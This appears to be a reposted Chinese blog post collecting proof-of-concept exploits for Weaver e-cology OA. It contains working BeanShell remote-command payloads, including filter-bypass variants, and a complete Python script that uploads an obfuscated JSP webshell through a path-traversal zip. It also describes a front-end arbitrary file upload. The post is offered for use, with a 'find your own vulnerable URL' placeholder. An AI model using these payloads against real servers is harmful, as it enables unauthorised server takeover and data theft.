【文档留存】泛微OA &&POC

最新推荐文章于 2024-06-04 09:16:31 发布
最新推荐文章于 2024-06-04 09:16:31 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: * 渗透测试记录 文章标签: 安全
原文链接:http://www.xxxx.com/网络搜集
版权

泛微OA &&POC

  • 泛微OA 多版本存在命令执行

POC&EXP来源于网络

漏洞描述:

泛微e-cology OA系统的J**A Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行

cnvd编号:CNVD-2019-32204

影响版本:e-cology <=9.0

漏洞修复:屏蔽/weaver/*目录的访问

漏洞复现:

1.漏洞路径:/weaver/bsh.servlet.BshServlet

 

 

 2.   把print(“hello!”)换成exec(“whoami”),就可以测试能否

执行系统命令了。

Poc1:bsh.script=u0065u0078u0065u0063(“whoami”);&bsh.servlet.output=raw

 如果有全局过滤器过滤了exec或eval,会有报错,

可以采用unicode编码、字符串拼接等方式绕过,见下图:

Poc2: bsh.script=u0065u0078u0065u0063(“whoami”);&bsh.servlet.output=raw

Poc3:bsh.script=eval%00(“ex”%2b”ec(bsh.httpServletRequest.getParameter(”command”) )”);&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw&command=whoami

  • 泛微OA weaver.common.ctrl任意文件上传漏洞

一、漏洞描述

泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器

二、漏洞影响

泛微OA

三、漏洞复现

存在漏洞的路径为

/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp

  • 1

使用POC进行文件上传

python poc.py

 

四、漏洞POC

(来源于网络,作者未知)

import zipfileimport randomimport sysimport requests


def generate_random_str(randomlength=16):
    random_str = ''
    base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
    length = len(base_str) - 1
    for i in range(randomlength):
        random_str += base_str[random.randint(0, length)]
    return random_str

mm = generate_random_str(8)

webshell_name1 = mm+'.jsp'
webshell_name2 = '../../../'+webshell_name1
def file_zip():
    shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="sun.misc.BASE64Decoder" %>
<%
    if(request.getParameter("cmd")!=null){
        BASE64Decoder decoder = new BASE64Decoder();
        Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
        Process e = (Process)
                rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
                        String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
                        Object[]{}), request.getParameter("cmd") );
        java.io.InputStream in = e.getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
    """   ## 替换shell内容
    zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
    zf.writestr(webshell_name2, shell)
def GetShell(urllist):
    file_zip()
    # print('上传文件中')
    urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
    file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
    try:
        requests.post(url=urls,files=file,timeout=60, verify=False)
        GetShellurl = urllist+'/cloudstore/'+webshell_name1
        GetShelllist = requests.get(url = GetShellurl)
        if GetShelllist.status_code == 200:
            print(GetShellurl+"?cmd=whoami")
    except:
        pass

GetShell("自己找的漏洞URL")
  • 泛微OA9前台任意文件上传

漏洞位于: /page/exportImport/uploadOperation.jsp文件中

Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈重点关注File file=new File(savepath+filename),Filename参数,是前台可控的,并且没有做任何过滤限制

 

利用非常简单,只要对着127.0.0.1/page/exportImport/uploadOperation.jsp来一个multipartRequest就可以,

然后请求路径:

view-source:http://0.0.0.0:5006/page/exportImport/fileTransfer/1.jsp 

linshao_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞复现】泛微OA E-Cology ProcessOverRequestByXml文件读取漏洞
晚风不及你
05-13 481
泛微OA E-Cology ProcessOverRequestByXml存在任意文件读取漏洞,允许未经授权的用户读取服务器上的敏感配置文件
泛微OA知识文档存放目录迁移.txt
05-31
泛微ecology 知识文档目录,占用空间,影响到数据备份等,将默认filesystem目录迁移到其它路径。
泛微OA检测工具-WeaverExploit_All(一)
siu~
08-16 853
泛微最近的漏洞利用工具(PS:2023)
【护网必备】高危漏洞综合利用工具
最新发布
Fly_鹏程万里
06-04 895
yongyou_chajet_RCE (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)yongyou_NC_FileReceiveServlet-RCE 反序列化rce (默认写入冰蝎4.0.3aes)e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)
泛微OA weaver.common.Ctrl 任意文件上传漏洞
DUANYU23的博客
05-17 3993
poc import zipfile import random import sys import requests def generate_random_str(randomlength=16): random_str = '' base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789' length = len(base_str) - 1 for i in range(randomlen
泛微OA检测工具-weaver_exp(二)
siu~
11-15 271
泛微OA漏洞综合利用脚本
泛微OA e-cology 8 最新webservice接口文档
12-11
泛微OA e-cology 8 最新webservice接口文档提供了一系列的webservice接口,用于对系统中的文档进行操作,包括创建文档、删除文档、更新文档、查看文档等。这些接口可以通过webservice调用,实现对文档的管理和操作。...
泛微OA抛转erp esb操作文档.docx
08-20
泛微OA抛转erp esb操作文档
WPS 中台V6 对接泛微OA标准配置文档
02-21
WPS 中台 V6 对接泛微 OA 标准配置文档文档主要介绍了 WPS 中台 V6 版本与泛微 OA 的标准配置文档,旨在帮助开发者快速了解 WPS 中台 V6 版本的配置要求,并成功对接泛微 OA。 1. 版本管理 在 WPS 中台 V6 ...
泛微OA 浮点数数据类型更新说明
07-14
泛微OA是一款企业级的协同办公自动化系统,用于提升组织的工作效率和管理水平。在这个系统中,数据的存储和处理是核心功能之一。本文档主要针对泛微OA中涉及的数据库表结构修改,特别是针对浮点数数据类型的更新,...
泛微OA数据库相关问题处理
02-27
泛微OA数据库相关问题处理 泛微OA数据库相关问题处理是数据库管理员和数据库开发者需要掌握的重要知识点。本文将对泛微OA数据库相关问题处理进行详细的介绍,涵盖ORACLE和SQLSERVER两种数据库管理系统。 目录1: ...
CNVD-2023-12632 泛微e-cology9 sql注入 附poc
qq_50854662的博客
04-06 2194
CNVD-2023-12632 泛微e-cology9 sql注入 附poc
php越权执行命令漏洞_泛微OA系统多版本存在命令执行漏洞
weixin_35327395的博客
03-09 1110
0x01泛微协同商务软件系统存在命令执行0x02 漏洞危害0x03 影响范围泛微 e-cology<=9.00x04 漏洞复现访问http://url/weaver/bsh.servlet.BshServlet输入 payload 如下:0x05 poc漏洞路径:/weaver/bsh.servlet.BshServletexec("whoami")curlhttp://xx.xx.x...
[漏洞挖掘]SRC-泛微OA文件上传
wwxxee
05-19 4051
SRC–泛微OA任意文件上传 泛微OA weaver.common.Ctrl 任意文件上传漏洞 存在漏洞的路径为: /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp 首页: 请求包: FOFA: app=“泛微-协同办公OA” && is_domain=true 普通注册会员只能获取5页信息。 有FOFA会员可以直接通过API请求拿到I
泛微OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
泛微OA9前台无限制getshell
Jay
06-05 1690
漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈重点关注File file=new File(savepath+filename),Filename参数,是前台可控的,并且没有做任何过滤限制利用非常简单,只要对着127.0.0.1/page/exportImport/uploadOperation.jsp来一个multipartRequest就可以,利用简单,自评高危!!
漏洞复现-泛微WeaverOA系列
aming小老弟
10-03 1077
泛微OA
泛微OA二次开发后处理接口编写
qq_45844443的博客
05-19 3704
泛微OA二次开发后处理接口编写
2021-泛微OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
"解密泛微OA产品常见问题全集
除了上述问题,用户在使用泛微OA时,还可能遇到一些其他具体的问题,可以参考官方文档或联系泛微OA技术支持获取进一步的帮助。 总之,泛微OA是一款功能强大且常用的办公自动化软件,但在使用过程中难免会遇到一些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值